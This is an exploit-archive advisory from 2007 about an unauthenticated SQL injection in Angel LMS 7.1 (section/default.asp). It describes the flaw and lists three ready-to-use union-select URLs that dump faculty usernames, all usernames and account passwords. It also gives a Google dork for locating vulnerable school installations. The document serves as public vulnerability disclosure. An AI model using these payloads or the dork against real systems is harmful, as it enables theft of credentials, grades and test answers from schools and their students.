Angel LMS 7.1 (default.asp id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Angel LMS 7.1 (default.asp id) Remote SQL Injection Vulnerability
# Published : 2007-03-01
# Author : Craig Heffner
# Previous Title : webSPELL <= 4.01.02 Multiple Remote SQL Injection Exploit
# Next Title : phpMyFAQ <= 1.6.7 Remote SQL Injection / Command Execution Exploit

#########################################################################
#
# Application:
#
#		Angel Learning Management Suite 7.1
#		http://www.angellearning.com
#
#########################################################################
#
# Description:
#
#		"ANGEL LMS is an inclusive suite of enterprise 
#		learning management tools that balances ease of 
#		use with powerful capabilities to deliver leading 
#		edge teaching and learning, impact learner success 
#		and measure effectiveness."
#
#		Basically, Angel is a CMS for education, providing
#		online forums, grading, email, chat, etc to faculty
#		and students. It is used as the primary Web interface
#		for several online schools and courses.
#
#########################################################################
#
# Vulnerability:
#
#		Angel 7.1 contains an SQL injection vulnerability in 
#		section/default.asp that grants an un-authenticated user 
#		access to all database tables and data. Examples include 
#		enumeration of tables, columns, user names, passwords, 
#		grades, and test questions/answers (you basically have 
#		access to everything).
#	
#########################################################################
#	
# Exploit Examples:
#
#	#Enumerate Faculty User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20faculty_accounts--"
#		
#	#Enumerate All User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"
#
#	#Enumerate Account Passwords#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
#
#########################################################################
#
# Google Dork:
#		intext:"2006 angel learning, inc" -pdf
#
#########################################################################
#
# Credit:
#	Exploit discovered and coded by Craig Heffner
#	heffnercj [at] gmail.com
#	http://www.craigheffner.com
#
#########################################################################

# www.Syue.com [2007-03-01]